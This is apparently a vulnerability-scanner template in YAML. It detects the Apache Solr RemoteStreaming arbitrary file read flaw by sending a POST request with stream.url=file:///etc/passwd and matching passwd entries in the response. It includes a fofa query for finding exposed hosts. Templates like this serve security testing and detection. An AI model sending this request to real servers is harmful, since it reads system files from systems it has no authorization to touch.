id: apache-solr-remotestreaming-anyfileread

info:
  name: Apache Solr RemoteStreaming 任意文件读取
  author: daffainfo
  severity: high
  verified: false
  description: |
    ApacheSolr是一个功能强大的开源搜索服务器，它支持REST风格API。在ApacheSolr未开启认证的情况下，攻击者可直接构造特定请求开启特定配置，并最终造成任意文件读取。
    fofa-query: app="APACHE-Solr"
  reference:
    - https://mp.weixin.qq.com/s/VMZfbUClU8I72pAzzitAOA

rules:
  r0:
    request:
      method: POST
      path: /solr/demo/debug/dump?param=ContentStreams
      body: |
        stream.url=file:///etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()